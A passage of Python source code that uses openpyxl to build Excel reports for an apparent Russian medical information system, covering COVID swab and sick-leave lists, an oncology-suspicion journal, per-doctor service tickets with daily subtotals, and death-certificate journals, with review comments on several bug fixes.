    for col_idx, (caption, width) in enumerate(captions, 1):
        head = ws1.cell(row=2, column=col_idx)
        head.value = caption
        head.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def covid_swab_data(ws1, data):
    """Fill the repeat-swab sheet: one row per patient starting at row 3.

    Bug fix: the border style was applied with range(1, 6), which skipped
    the sixth column ('Адрес') even though a value is written there; the
    range now covers all six data columns.
    :return: the worksheet
    """
    r = 3
    style_border1 = NamedStyle(name="style_border1")
    bd = Side(style='thin', color="000000")
    style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border1.font = Font(bold=False, size=11)
    style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
    for i in data:
        ws1.cell(row=r, column=1).value = i["fio_patient"]
        ws1.cell(row=r, column=2).value = i["number"]
        ws1.cell(row=r, column=3).value = i["Контактный телефон"]
        ws1.cell(row=r, column=4).value = i["Оператор"]
        ws1.cell(row=r, column=5).value = normalize_dash_date(i["Сдача повторного мазка на COVID"])
        ws1.cell(row=r, column=6).value = i["Адрес"]
        for j in range(1, 7):  # style all six columns (was range(1, 6))
            ws1.cell(row=r, column=j).style = style_border1
        r += 1
    return ws1
def covid_bl_base(ws1):
    """
    Header for the sick-leave continuation sheet: merged title row plus the
    five column captions on row 2.
    :return: the worksheet
    """
    header_style = NamedStyle(name="style_border")
    thin = Side(style='thin', color="000000")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
    ws1.cell(row=1, column=1).value = 'Продолжение БЛ'
    ws1.cell(row=1, column=1).style = header_style
    # Header row height.
    ws1.row_dimensions[2].height = 15
    captions = (
        ('ФИО', 25),
        ('№ карты', 15),
        ('Телефон', 20),
        ('Оператор', 25),
        ('Дата', 25),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        head = ws1.cell(row=2, column=col_idx)
        head.value = caption
        head.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def covid_bl_data(ws1, data):
    """Fill the sick-leave continuation sheet: one row per patient from row 3.

    Bug fix: the row counter was never advanced, so every record overwrote
    row 3 (the sibling covid_swab_data does advance it); each record now
    gets its own row.
    :return: the worksheet
    """
    r = 3
    style_border1 = NamedStyle(name="style_border1")
    bd = Side(style='thin', color="000000")
    style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border1.font = Font(bold=False, size=11)
    style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
    for i in data:
        ws1.cell(row=r, column=1).value = i["fio_patient"]
        ws1.cell(row=r, column=2).value = i["number"]
        ws1.cell(row=r, column=3).value = i["Контактный телефон"]
        ws1.cell(row=r, column=4).value = i["Оператор"]
        ws1.cell(row=r, column=5).value = normalize_dash_date(i["Продолжение БЛ"])
        for j in range(1, 6):
            ws1.cell(row=r, column=j).style = style_border1
        r += 1  # advance to the next sheet row (was missing)
    return ws1
def onco_base(ws1, d_s, d_e):
    """
    Header for the oncology-suspicion journal: merged title row for the
    period [d_s, d_e] plus the eight column captions on row 3.
    :return: the worksheet
    """
    header_style = NamedStyle(name="style_border")
    thin = Side(style='thin', color="000000")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=13)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=8)
    ws1.cell(row=1, column=1).value = f'ЖУРНАЛ учета онкоподозрения c {d_s} по {d_e}'
    ws1.cell(row=1, column=1).style = header_style
    # Spacer row between the title and the captions.
    ws1.row_dimensions[2].height = 15
    ws1.cell(row=2, column=1).value = ''
    captions = (
        ('№ п/п', 5),
        ('ФИО пациента', 30),
        ('Дата рождения', 15),
        ('N карты', 15),
        ('Врач поставил', 30),
        ('Дата постановки', 20),
        ('Врач снял', 30),
        ('Дата снятия', 20),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        head = ws1.cell(row=3, column=col_idx)
        head.value = caption
        head.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def passed_onco_data(ws1, data):
    """Fill the oncology-suspicion journal: one row per record from row 4.

    Each record carries, in order: patient FIO, birthday, card number,
    doctor who set the suspicion, date set, doctor who removed it, date
    removed.  Empty fields are rendered as a single space.
    :return: the worksheet
    """
    row_style = NamedStyle(name="style_border1")
    thin = Side(style='thin', color="000000")
    row_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    row_style.font = Font(bold=False, size=12)
    row_style.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
    blank = ' '
    r = 3
    for n, record in enumerate(data, 1):
        r += 1
        row_values = (
            n,
            record[0] or blank,
            record[1] or blank,
            record[2] or blank,
            record[3] or blank,
            record[4] or blank,
            record[5] or blank,
            record[6] or blank,
        )
        for col_idx, value in enumerate(row_values, 1):
            cell = ws1.cell(row=r, column=col_idx)
            cell.value = value
            cell.style = row_style
    return ws1
def style_sheet():
    """Create the four NamedStyles shared by the statistics sheets.

    :return: tuple ``(style_border, style_o, style_border1, style_border_res)``:
        bold bordered, bold borderless, regular bordered, and regular
        bordered centered.
    """
    thin = Side(style='thin', color="000000")
    box = Border(left=thin, top=thin, right=thin, bottom=thin)

    style_border = NamedStyle(name="style_border")
    style_border.border = box
    style_border.font = Font(bold=True, size=11)
    style_border.alignment = Alignment(wrap_text=True)

    style_border1 = NamedStyle(name="style_border1")
    style_border1.border = box
    style_border1.font = Font(bold=False, size=11)
    style_border1.alignment = Alignment(wrap_text=True)

    style_o = NamedStyle(name="style_o")
    style_o.font = Font(bold=True, size=11)

    style_border_res = NamedStyle(name="style_border_res")
    style_border_res.border = box
    style_border_res.font = Font(bold=False, size=11)
    style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    return (style_border, style_o, style_border1, style_border_res)
def statistics_tickets_base(ws1, i_obj, type_fin, d1, d2, style_border, style_o):
    """
    Sheet header for the per-doctor tickets report: column widths and
    captions (row 7), doctor info, reporting period and financing source.
    :return: the worksheet
    """
    captions = (
        ('Дата', 13),
        ('Кол-во', 7),
        ('Услуга', 15),
        ('Соисполнитель', 9),
        ('ФИО пациента,\n№ направления', 31),
        ('Дата рождения', 13),
        ('№ карты', 12),
        ('Данные полиса', 27),
        ('Код услуги', 16),
        ('Услуга \n (ует/мин)', 12),
        ('Время \n подтверждения', 18),
        ('Онкоподозрение', 13),
        ('Первичный прием', 12),
        ('Цель \n посещения\n(код)е', 13),
        ('Диагноз \n МКБ', 13),
        ('Впервые', 13),
        ('Результат \n обращения \n(код)', 13),
        ('Исход(код)', 13),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        head = ws1.cell(row=7, column=col_idx)
        head.value = caption
        head.style = style_border
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    # Bold label cells.
    labels = (
        (1, 1, 'Сотрудник'),
        (2, 1, 'Должность'),
        (4, 1, 'Период:'),
        (1, 5, 'Код врача'),
        (3, 5, 'Источник'),
    )
    for row_num, col_num, caption in labels:
        label_cell = ws1.cell(row=row_num, column=col_num)
        label_cell.value = caption
        label_cell.style = style_o
    # Values next to the labels.
    ws1.cell(row=1, column=2).value = i_obj.fio
    ws1.cell(row=2, column=2).value = i_obj.specialities.title if i_obj.specialities else ""
    ws1.cell(row=5, column=1).value = d1
    ws1.cell(row=5, column=2).value = 'по'
    ws1.cell(row=5, column=3).value = d2
    ws1.cell(row=1, column=6).value = i_obj.personal_code
    fin_obj = IstochnikiFinansirovaniya.objects.get(pk=type_fin)
    ws1.cell(row=3, column=6).value = fin_obj.title
    return ws1
def statistics_tickets_data(ws1, issl_obj, i_obj, style_border1):
    """Fill the per-doctor tickets sheet (detail rows from row 8 on).

    Rows are grouped by confirmation date: when the date changes, a green
    subtotal row (count in B, UET in J) is emitted for the previous day and
    that day's detail rows are collapsed via an outline group; a final
    subtotal closes the last day, then an orange grand-total row sums the
    per-day subtotal rows.

    :param ws1: worksheet prepared by statistics_tickets_base
    :param issl_obj: iterable of result tuples (column map in the comment below),
        assumed ordered by confirmation date
    :param i_obj: the doctor object; its pk decides the UET share credited
    :param style_border1: style applied to every detail row
    :return: the worksheet
    """
    # i_obj - the doctor object
    my_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='a9d094', end_color='a9d094')
    total_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='ffcc66', end_color='ffcc66')
    r = 7       # last written row; detail rows start at 8
    r1 = r + 1  # first detail row of the current day group
    total_sum = []  # sheet rows holding the per-day subtotals (feeds the grand total)
    # one_days = timedelta(1)
    current_date = ''
    for issled in issl_obj:
        # Column order in issled:
        # title, code, is_first_reception, polis_n, polis_who_give, \
        # first_time, napravleniye_id, doc_confirmation_id, def_uet, co_executor_id, \
        # co_executor_uet, co_executor2_id, co_executor2_uet, datetime_confirm, date_confirm, \
        # time_confirm, maybe_onco, purpose, diagnos, iss_result, \
        # outcome, card_number, client_family, client_name, client_patronymic, \
        # birthday
        empty = ' '
        # current_datetime_confirm = issled[13]
        current_date = issled[14]
        # current_count = 1
        current_research_title = issled[0]
        f = issled[22] or empty
        n = issled[23] or empty
        p = issled[24] or empty
        current_napr = str(issled[6])
        current_patient_napr = f'{f} {n} {p}\n{current_napr}'
        current_born = issled[25]
        current_card = issled[21]
        polis_n = issled[3] or ''
        polis_who = issled[4] or ''
        current_polis = f'{polis_n};\n{polis_who}'
        current_code_reserch = issled[1]
        current_doc_conf = issled[7]
        current_def_uet = issled[8] or 0
        current_co_exec1 = issled[9]
        current_uet1 = issled[10] or 0
        current_co_exec2 = issled[11]
        current_uet2 = issled[12] or 0
        current_time_confirm = issled[15]
        current_isfirst = issled[2]
        current_onko = issled[16]
        current_purpose = issled[17]
        current_diagnos = issled[18]
        current_firsttime = issled[5]
        current_result = issled[19]
        current_octome = issled[20]
        # current_price = ''
        # When the date changed, close the previous day group with a subtotal row.
        if r != 7 and r != 8:
            befor_date = ws1.cell(row=r, column=1).value
            # NOTE(review): istitle() presumably distinguishes an already-written
            # 'Итого за …' subtotal row from a plain date string — confirm.
            if current_date != befor_date and not (ws1.cell(row=r, column=1).value).istitle():
                r = r + 1
                ws1.cell(row=r, column=1).value = 'Итого за ' + befor_date[:2]
                ws1.cell(row=r, column=2).value = f'=SUM(B{r1}:B{r - 1})'
                ws1.cell(row=r, column=10).value = f'=SUM(J{r1}:J{r - 1})'
                total_sum.append(r)
                # Collapse the finished day's detail rows under an outline group.
                ws1.row_dimensions.group(r1, r - 1, hidden=True)
                rows = ws1[f'A{r}:V{r}']
                for row in rows:
                    for cell in row:
                        cell.fill = my_fill
                r1 = r + 1
        r = r + 1
        ws1.cell(row=r, column=1).value = current_date
        ws1.cell(row=r, column=2).value = 1
        ws1.cell(row=r, column=3).value = current_research_title
        # UET share credited to this doctor: main executor ('ОСН') and/or
        # co-executor slots 1/2 ('СО-1', 'СО-2'), matched by pk.
        sum_uet = 0
        co_exec = ''
        if (current_doc_conf == i_obj.pk) and (current_co_exec1 == i_obj.pk):
            sum_uet = sum_uet + current_def_uet
            co_exec = co_exec + 'ОСН'
        if (current_doc_conf == i_obj.pk) and (current_co_exec1 != i_obj.pk):
            sum_uet = sum_uet + current_def_uet
            co_exec = co_exec + 'ОСН'
        if (current_doc_conf != i_obj.pk) and (current_co_exec1 == i_obj.pk):
            sum_uet = sum_uet + current_uet1
            co_exec = co_exec + 'СО-1'
        if current_co_exec2 == i_obj.pk:
            sum_uet = sum_uet + current_uet2
            co_exec = co_exec + ', СО-2'
        ws1.cell(row=r, column=4).value = co_exec
        ws1.cell(row=r, column=5).value = current_patient_napr
        ws1.cell(row=r, column=6).value = current_born
        ws1.cell(row=r, column=7).value = current_card
        ws1.cell(row=r, column=8).value = current_polis
        ws1.cell(row=r, column=9).value = current_code_reserch
        ws1.cell(row=r, column=10).value = str(sum_uet)
        ws1.cell(row=r, column=11).value = current_time_confirm
        ws1.cell(row=r, column=12).value = current_onko
        ws1.cell(row=r, column=13).value = current_isfirst
        ws1.cell(row=r, column=14).value = current_purpose
        ws1.cell(row=r, column=15).value = current_diagnos
        ws1.cell(row=r, column=16).value = current_firsttime
        ws1.cell(row=r, column=17).value = current_result
        ws1.cell(row=r, column=18).value = current_octome
        ws1.cell(row=r, column=19).value = ''
        rows = ws1[f'A{r}:V{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border1
    # Subtotal for the last (still open) day group.
    r = r + 1
    ws1.cell(row=r, column=1).value = 'Итого за ' + current_date[:2]
    ws1.cell(row=r, column=2).value = f'=SUM(B{r1}:B{r - 1})'
    ws1.cell(row=r, column=10).value = f'=SUM(J{r1}:J{r - 1})'
    ws1.row_dimensions.group(r1, r - 1, hidden=True)
    total_sum.append(r)
    rows = ws1[f'A{r}:V{r}']
    for row in rows:
        for cell in row:
            cell.fill = my_fill
    # Grand total: sum the per-day subtotal cells collected in total_sum.
    # NOTE(review): the assembled formulas end with a trailing comma before
    # ')' — Excel appears to tolerate the empty argument, but verify.
    t_s = '=SUM('
    t_s_uet = '=SUM('
    for ts in total_sum:
        t_uet = ts
        t_s = t_s + f'(B{ts})' + ','
        t_s_uet = t_s_uet + f'(J{t_uet})' + ','
    t_s = t_s + ')'
    t_s_uet = t_s_uet + ')'
    r = r + 1
    ws1.cell(row=r, column=1).value = 'Итого Всего'
    ws1.cell(row=r, column=2).value = t_s
    ws1.cell(row=r, column=10).value = t_s_uet
    rows = ws1[f'A{r}:V{r}']
    for row in rows:
        for cell in row:
            cell.fill = total_fill
    return ws1
def inderect_job_base(ws1, doc_obj, d1, d2):
    """
    Header for the indirect-services sheet: highlighted title row, column
    widths, doctor name and reporting period.
    :return: the worksheet
    """
    pink_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='FCD5B4', end_color='FCD5B4')
    for row in ws1[f'A{1}:V{1}']:
        for cell in row:
            cell.fill = pink_fill
    for col_idx, width in ((1, 15), (2, 30), (3, 15)):
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    ws1.cell(row=1, column=1).value = "Косвенные услуги"
    ws1.cell(row=2, column=1).value = "Сотрудник"
    ws1.cell(row=2, column=2).value = doc_obj.fio
    ws1.cell(row=3, column=1).value = f'c {d1}'
    ws1.cell(row=3, column=2).value = f'по {d2}'
    return ws1
def inderect_job_data(ws1, indirect_job):
    """Write indirect-job rows: one row per (group, job) pair from row 5.

    :param indirect_job: mapping group -> {job name -> value}
    :return: the worksheet
    """
    row_num = 4
    for group, jobs in indirect_job.items():
        for job_name, job_value in jobs.items():
            row_num += 1
            ws1.cell(row=row_num, column=1).value = group
            ws1.cell(row=row_num, column=2).value = job_name
            ws1.cell(row=row_num, column=3).value = job_value
    return ws1
def statistic_research_base(ws1, d1, d2, research_titile):
    """
    Header for the per-service statistics sheet: service title, reporting
    period and the thirteen column captions on row 4.
    :return: the worksheet
    """
    header_style = NamedStyle(name="style_border")
    thin = Side(style='thin', color="000000")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=1).value = 'Услуга:'
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    captions = (
        ('Исполнитель', 26),
        ('Направление, за дату', 15),
        ('Дата подтверждения', 16.5),
        ('Время подтверждения', 16.5),
        ('Источник', 10),
        ('Цена', 10),
        ('Кол-во', 7),
        ('Скидка', 7.5),
        ('Сумма', 14),
        ('Физлицо', 26),
        ('Дата рождения', 12),
        ('Возраст', 8),
        ('Карта', 15),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        head = ws1.cell(row=4, column=col_idx)
        head.value = caption
        head.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def statistic_research_data(ws1, researches):
    """
    Fill the per-service statistics rows (one sheet row per record, from row 5).

    ``researches`` is the raw SQL result; positional column order:
    napr, date_confirm, time_confirm, create_date_napr, create_time_napr,
    doc_fio, coast, discount, how_many, ((coast + (coast/100 * discount)) * how_many)::NUMERIC(10,2) AS sum_money,
    ist_f, time_confirmation, num_card, ind_family, ind_name,
    patronymic, birthday, date_born, to_char(EXTRACT(YEAR from age(time_confirmation, date_born)), '999') as ind_age
    :return: the worksheet
    """
    style_border_res = NamedStyle(name="style_border_res")
    bd = Side(style='thin', color="000000")
    style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border_res.font = Font(bold=False, size=11)
    style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    r = 4  # data rows start below the row-4 header
    for res in researches:
        r += 1
        current_doc = res[5]
        current_napr = res[0]
        current_napr_atcreate = res[3]
        current_date_confirm = res[1]
        current_time_confirm = res[2]
        current_ist_f = res[10]
        current_coast = res[6]
        current_how_many = res[8]
        current_discount = res[7]
        current_price_total = res[9]
        current_ind_fio = f'{res[13]} {res[14]} {res[15]}'
        current_born = res[16]
        current_age = res[18]
        current_num_card = res[12]
        ws1.cell(row=r, column=1).value = current_doc
        ws1.cell(row=r, column=2).value = f'{current_napr}, {current_napr_atcreate}'
        ws1.cell(row=r, column=3).value = current_date_confirm
        ws1.cell(row=r, column=4).value = current_time_confirm
        ws1.cell(row=r, column=5).value = current_ist_f
        ws1.cell(row=r, column=6).value = current_coast
        ws1.cell(row=r, column=7).value = current_how_many
        ws1.cell(row=r, column=8).value = current_discount
        ws1.cell(row=r, column=9).value = current_price_total
        ws1.cell(row=r, column=10).value = current_ind_fio
        ws1.cell(row=r, column=11).value = current_born
        ws1.cell(row=r, column=12).value = current_age
        ws1.cell(row=r, column=13).value = current_num_card
        # NOTE(review): column 14 (res[19]) is beyond the documented column
        # list, has no caption in statistic_research_base (13 columns) and
        # falls outside the styled A:M range below — confirm it is intended.
        ws1.cell(row=r, column=14).value = res[19]
        rows = ws1[f'A{r}:M{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border_res
    return ws1
def statistic_research_death_base(ws1, d1, d2, research_titile):
    """
    Header for the death-certificate journal: service title, reporting
    period and the 34 column captions on row 4.
    :return: the worksheet
    """
    header_style = NamedStyle(name="style_border")
    thin = Side(style='thin', color="000000")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=1).value = 'Услуга:'
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    captions = (
        ('Серия', 13),
        ('Номер', 15),
        ('Вид МСС', 17),
        ('Медицинская организация выдавшая свидететельство', 18),
        ('Прикрепление пациента', 18),
        ('Участок', 10),
        ('Дата смерти', 11),
        ('Дата рождения', 11),
        ('ФИО умершего пациента', 25),
        ('Пол (м/ж)', 6),
        ('Возраст на дату смерти', 6),
        ('а) болезнь или состояние, непосредст-венно приведшее к смерти', 17),
        ('а) период', 10),
        ('а) Код по МКБ- 10', 9),
        ('б) патологи-ческое состояние, которое привело к болезни или состоянию, непосредст-венно приведшее к смерти', 17),
        ('б) период', 10),
        ('б) Код по МКБ- 10', 9),
        ('в) перво-начальная причина смерти', 17),
        ('в) период', 10),
        ('в) Код по МКБ- 10', 9),
        ('г) внешняя причина при травмах и отравлениях', 17),
        ('г) период', 10),
        ('г) Код по МКБ- 10', 9),
        ('II.Прочие важные состояния способствовавшие смерти', 15),
        ('класс заболевания первоначальной причины смерти', 15),
        ('Место смерти (1/0)', 15),
        ('Название стационара', 15),
        ('ДТП (1/0)', 12),
        ('Материнская смертность (1/0)', 15),
        ('ФИО выдавшего свидетельства', 20),
        ('Тип места смерти', 25),
        ('ОКПО', 16),
        ('ОКАТО', 16),
        ('Экспертиза', 35),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        head = ws1.cell(row=4, column=col_idx)
        head.value = caption
        head.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def statistic_reserved_research_death_base(ws1, d1, d2, research_titile):
    """
    Header for the reserved death-certificate numbers sheet: service title,
    reporting period and the five column captions on row 4.
    :return: the worksheet
    """
    header_style = NamedStyle(name="style_border_rz")
    thin = Side(style='thin', color="000000")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=1).value = 'Услуга:'
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    captions = (
        ('Медицинская организация', 40),
        ('Номер в резерве', 20),
        ('Дата создания', 22),
        ('<NAME>', 35),
        ('Направление', 20),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        head = ws1.cell(row=4, column=col_idx)
        head.value = caption
        head.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def statistic_research_death_base_card(ws1, d1, d2, research_titile):
    """
    Header for the card-based death-certificate journal: same layout as
    statistic_research_death_base but registers a distinct named style
    ("style_border_ca").
    :return: the worksheet
    """
    header_style = NamedStyle(name="style_border_ca")
    thin = Side(style='thin', color="000000")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=1).value = 'Услуга:'
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    captions = (
        ('Серия', 13),
        ('Номер', 15),
        ('Вид МСС', 17),
        ('Медицинская организация выдавшая свидететельство', 18),
        ('Прикрепление пациента', 18),
        ('Участок', 10),
        ('Дата смерти', 11),
        ('Дата рождения', 11),
        ('ФИО умершего пациента', 25),
        ('Пол (м/ж)', 6),
        ('Возраст на дату смерти', 6),
        ('а) болезнь или состояние, непосредст-венно приведшее к смерти', 17),
        ('а) период', 10),
        ('а) Код по МКБ- 10', 9),
        ('б) патологи-ческое состояние, которое привело к болезни или состоянию, непосредст-венно приведшее к смерти', 17),
        ('б) период', 10),
        ('б) Код по МКБ- 10', 9),
        ('в) перво-начальная причина смерти', 17),
        ('в) период', 10),
        ('в) Код по МКБ- 10', 9),
        ('г) внешняя причина при травмах и отравлениях', 17),
        ('г) период', 10),
        ('г) Код по МКБ- 10', 9),
        ('II.Прочие важные состояния способствовавшие смерти', 15),
        ('класс заболевания первоначальной причины смерти', 15),
        ('Место смерти (1/0)', 15),
        ('Название стационара', 15),
        ('ДТП (1/0)', 12),
        ('Материнская смертность (1/0)', 15),
        ('ФИО выдавшего свидетельства', 20),
        ('Тип места смерти', 25),
        ('ОКПО', 16),
        ('ОКАТО', 16),
        ('Экспертиза', 35),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        head = ws1.cell(row=4, column=col_idx)
        head.value = caption
        head.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def statistic_research_death_data(ws1, researches, expertise_final_data):
    """Fill the death-certificate report sheet: one row per certificate.

    Starts writing at row 5 (the header occupies rows 1-4). Records without a
    certificate kind are skipped; a falsy record terminates the whole loop.

    :param ws1: openpyxl worksheet prepared by the matching *_base builder
    :param researches: iterable of per-certificate dicts (keys are the Russian
        field captions produced upstream)
    :param expertise_final_data: dict mapping issledovaniye_id -> expertise text
    :return: the filled worksheet
    """
    style_border_res = NamedStyle(name="style_border_res")
    bd = Side(style='thin', color="000000")
    style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border_res.font = Font(bold=False, size=11)
    style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    r = 4
    for i in researches:
        # NOTE(review): a single falsy record stops processing entirely (not
        # just that record) — presumably a sentinel from the query; confirm.
        if not i:
            return ws1
        try:
            # The certificate kind may arrive as a {"title": ...} dict or as a
            # plain string; the except path handles the latter.
            type_doc_death = i["Вид медицинского свидетельства о смерти"]["title"]
        except:
            type_doc_death = i.get("Вид медицинского свидетельства о смерти", "")
        if not type_doc_death:
            continue
        r += 1
        ws1.cell(row=r, column=1).value = i["Серия"]
        ws1.cell(row=r, column=2).value = i["Номер"]
        ws1.cell(row=r, column=3).value = type_doc_death
        ws1.cell(row=r, column=4).value = i["hosp_title"]
        mo_attachment, mo_district = "-", "-"
        if i.get("Прикрепление", None):
            # "Прикрепление" is "<TFOMS code> — <district>"; the code is mapped
            # to a hospital title when known.
            attachment_data = i.get("Прикрепление").split("—")
            mo_attachment = HOSPITAL_TITLE_BY_CODE_TFOMS.get(attachment_data[0].strip(), attachment_data[0].strip())
            mo_district = attachment_data[1]
        ws1.cell(row=r, column=5).value = mo_attachment
        ws1.cell(row=r, column=6).value = mo_district
        ws1.cell(row=r, column=7).value = normalize_dash_date(i["Дата смерти"])
        ws1.cell(row=r, column=8).value = i["Дата рождения"]
        ws1.cell(row=r, column=9).value = i["fio_patient"]
        ws1.cell(row=r, column=10).value = i["sex"]
        d1 = du_parse(i["Дата смерти"])
        try:
            # Age at death in whole years; "-" if the birth date is unparsable.
            d2 = du_parse(i["Дата рождения"])
            delta = relativedelta(d1, d2)
            ws1.cell(row=r, column=11).value = delta.years
        except:
            ws1.cell(row=r, column=11).value = "-"
        # (а) disease or condition directly leading to death
        diag_data = get_table_diagnos(i, "а) Болезнь или состояние, непосредственно приведшее к смерти")
        ws1.cell(row=r, column=12).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=13).value = diag_data[0]
        ws1.cell(row=r, column=14).value = diag_data[1]["code"]
        # (б) pathological condition that caused (а)
        diag_data = get_table_diagnos(i, "б) патологическое состояние, которое привело к возникновению вышеуказанной причины:")
        ws1.cell(row=r, column=15).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=16).value = diag_data[0]
        ws1.cell(row=r, column=17).value = diag_data[1]["code"]
        # (в) underlying (original) cause of death
        diag_data = get_table_diagnos(i, "в) первоначальная причина смерти:")
        ws1.cell(row=r, column=18).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=19).value = diag_data[0]
        ws1.cell(row=r, column=20).value = diag_data[1]["code"]
        # (г) external cause for injuries/poisonings
        diag_data = get_table_diagnos(i, "г) внешняя причина при травмах и отравлениях:")
        ws1.cell(row=r, column=21).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=22).value = diag_data[0]
        ws1.cell(row=r, column=23).value = diag_data[1]["code"]
        diag_data = get_table_diagnos(i, "II. Прочие важные состояния, способствовавшие смерти, но не связанные с болезнью или патологическим состоянием, приведшим к ней")
        ws1.cell(row=r, column=24).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]} {diag_data[0]}'
        ws1.cell(row=r, column=25).value = ""
        # "Место смерти" may be a JSON string or a dict with an "address" key;
        # fall back to "-" when neither parse succeeds.
        place_death_details = ""
        try:
            place_death_details = json.loads(i["Место смерти"])
            is_dict = True
        except:
            is_dict = False
        if not is_dict:
            try:
                place_death_details = i["Место смерти"].get("address", None)
                is_dict = True
            except:
                is_dict = False
        if not is_dict:
            place_death_details = "-"
        ws1.cell(row=r, column=26).value = place_death_details
        # Hospital (stationary) name
        ws1.cell(row=r, column=27).value = i.get("МО", "")
        # Road-accident flag
        ws1.cell(row=r, column=28).value = i["ДТП"]
        ws1.cell(row=r, column=29).value = i["Беременность"]
        if i.get("Заполнил", None):
            who_write = i.get("Заполнил")
        else:
            who_write = ""
        ws1.cell(row=r, column=30).value = who_write
        ws1.cell(row=r, column=31).value = ""
        ws1.cell(row=r, column=32).value = ""
        ws1.cell(row=r, column=33).value = ""
        experise = ""
        if expertise_final_data.get(i.get('issledovaniye_id', ""), ""):
            experise = expertise_final_data.get(i.get('issledovaniye_id', ""), "")
        ws1.cell(row=r, column=34).value = experise
        # Apply the thin-border style to the whole written row (A..AH).
        rows = ws1[f'A{r}:AH{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border_res
    return ws1
def statistic_research_death_data_card(ws1, researches):
    """Fill the death-certificate *card* report sheet: one row per certificate.

    Variant of statistic_research_death_data without expertise data but with
    the place-of-death type and the issuing hospital's OKPO/OKATO codes.
    Starts writing at row 5; records without a certificate kind are skipped,
    and a falsy record terminates the whole loop.

    :param ws1: openpyxl worksheet prepared by statistic_research_death_base_card
    :param researches: iterable of per-certificate dicts (Russian field captions)
    :return: the filled worksheet
    """
    style_border_res = NamedStyle(name="style_border_res_ca")
    bd = Side(style='thin', color="000000")
    style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border_res.font = Font(bold=False, size=11)
    style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    r = 4
    for i in researches:
        # NOTE(review): a single falsy record stops processing entirely —
        # presumably a sentinel from the query; confirm.
        if not i:
            return ws1
        try:
            # The certificate kind may arrive as a {"title": ...} dict or as a
            # plain string; the except path handles the latter.
            type_doc_death = i["Вид медицинского свидетельства о смерти"]["title"]
        except:
            type_doc_death = i.get("Вид медицинского свидетельства о смерти", "")
        if not type_doc_death:
            continue
        r += 1
        ws1.cell(row=r, column=1).value = i["Серия"]
        ws1.cell(row=r, column=2).value = i["Номер"]
